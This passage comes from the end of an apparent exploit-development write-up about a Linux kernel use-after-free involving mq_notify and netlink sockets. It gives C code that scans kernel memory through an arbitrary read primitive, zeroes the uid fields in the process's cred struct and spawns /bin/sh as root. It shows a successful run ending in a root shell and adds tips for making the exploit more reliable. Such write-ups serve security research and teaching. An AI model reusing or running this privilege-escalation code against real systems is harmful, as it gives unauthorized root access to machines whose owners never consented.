        if(*(((uint32_t*)pattern)+1)!=arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4+4))
            continue;
        printf("check 2\n");
        if(*(((uint32_t*)pattern)+2)!=arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4+8))
            continue;
        printf("check 3\n");
        *(uint32_t*)&real_cred = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-4*4);
        *((uint32_t*)&real_cred+1) = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-3*4);
        if(real_cred<(void*)0xffff000000000000)
        {
            real_cred=0;
            continue;
        }
        printf("real_cred: %p\n", real_cred);
        printf("check 4\n");
        *((uint32_t*)&cred) = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-2*4);
        *((uint32_t*)&cred+1) = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-1*4);
        if(cred<(void*)0xffff000000000000)
        {
            real_cred=0;
            cred=0;
            continue;
        }
        printf("cred: %p\n", cred);
        break;
    }
}

This is the code I used to implement this approach in the actual exploit.
You can see that in lines 4, 7 and 10 I’m checking that the first 12 bytes of the comm field are as expected.

If they are, I proceed to read what should be the real_cred and cred pointers and perform a sanity check in lines 15 and 24 to see if they point into the kernel’s address range.
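The check in the scan loop only tests for the upper canonical half. A somewhat stricter filter is sketched below. It assumes the classic x86_64 layout without memory region randomisation, where the direct mapping of physical memory spans 0xffff880000000000 to 0xffffc7ffffffffff, and it assumes that heap objects such as cred are at least 8-byte aligned. The function name is hypothetical and this is not what the exploit does.

```c
#include <stdbool.h>
#include <stdint.h>

#define DIRECT_MAP_START 0xffff880000000000ull  /* assumed layout, see above */
#define DIRECT_MAP_END   0xffffc7ffffffffffull

/* True if p could plausibly be a pointer to a slab object. */
bool plausible_heap_ptr(uint64_t p)
{
    if (p < DIRECT_MAP_START || p > DIRECT_MAP_END)
        return false;
    return (p & 7) == 0;        /* reject misaligned candidates */
}
```

The cred pointer from the example run, 0xffff880216c88b80, passes this filter, while a pair of uid words read as a pointer (0x000003e8000003e8) does not.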

for(i=0;i<0x20; i++)
{
    uint32_t val = arbitrary_read(dupped_netlink_socket_2,cred+i*4);
    if(val==uid)
    {
        arbitrary_write(dupped_netlink_socket_2,cred+i*4,0);
        arbitrary_read(dupped_netlink_socket_2,cred+i*4-4);
    }
}

After that I just step through the cred struct’s memory, and wherever we find our own uid we replace it with 0 to become root.

msgrcv(msq_id, dummyBuf, msg_size,msg_size,IPC_NOWAIT);
socket(AF_NETLINK,SOCK_DGRAM,NETLINK_USERSOCK);

Next we perform some “cleanup” by freeing the UAF memory and allocating a fresh netlink_sock, which should land in the freed slot.
Now, if we exit the program or execve, the kernel will find data “as expected” when performing cleanup.

Finally, we just print the current uid and, if we’re root, execve “/bin/sh”.

printf("getuid: %d\n", getuid());
if(!getuid())
{
    char* argv[]={"/bin/sh", NULL};
    char* envp[] = {NULL};
    execve("/bin/sh",argv, envp);
}
exit(0);

And here’s an example output of a successful run.

firzen@debian:~/exploit-dev$ ./exploit
[C] Hello there General Kenobi
mq_notify: Bad file descriptor
[C] Hello there General Kenobi
mq_notify: Bad file descriptor
[+] Leaked heap kptr: 0xffff8802151b22e0
comm: ZaZtGjuGAeAA
Found comm candidate at: 0xffff8802151e1b60
check 2
check 3
real_cred: 0xffff880216c88b80
check 4
cred: 0xffff880216c88b80
Read before
00000007 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 
000003e8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
ffffffff 0000003f 00000000 00000000 14e17d00 ffff8802 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 db9dbf40 ffff8800 
 
Read after
00000007 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
getuid: 0
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth),1000(firzen)
#

Final Notes

This exploit is not very reliable, mainly because of heap fragmentation in the kernel and because I’m not very cleanly searching through available memory.

It shouldn’t be particularly hard to improve reliability. For example, leaked pointers could be used to identify valid regions of memory to search through.

Another issue with reliability is losing the race to control the netlink_sock struct memory, which could at least be detected using MSG_COPY to avoid crashes.

If you are trying this on VirtualBox, the VBoxService will race against you here, so it might be a good idea to kill or disable it.